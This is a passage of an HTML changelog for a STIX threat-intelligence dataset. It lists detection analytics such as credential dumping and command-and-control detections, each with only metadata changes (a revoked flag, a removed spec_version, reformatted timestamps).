collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0513] Detection of Cached Domain Credential Dumping via Local Hash Cache Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.685000+00:00</td></tr></tbody></table></details><hr><h4>[DET0820] Detection of Client Configurations</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0846] Detection of Cloud Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0879] Detection of Cloud Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0291] Detection of Cloud Service Dashboard Usage via GUI-Based Cloud Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0805] Detection of Code Repositories</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0875] Detection of Code Signing Certificates</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0833] Detection of Code Signing Certificates</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0444] Detection of Command and Control Over Application Layer Protocols</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0876] Detection of Compromise Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0885] Detection of Compromise Infrastructure</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0363] Detection of Credential Dumping from LSASS Memory via Access and Dump Sequence</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0139] Detection of Credential Harvesting via API Hooking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0480] Detection of Credential Harvesting via Web Portal Modification</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0813] Detection of Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0843] Detection of DNS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX 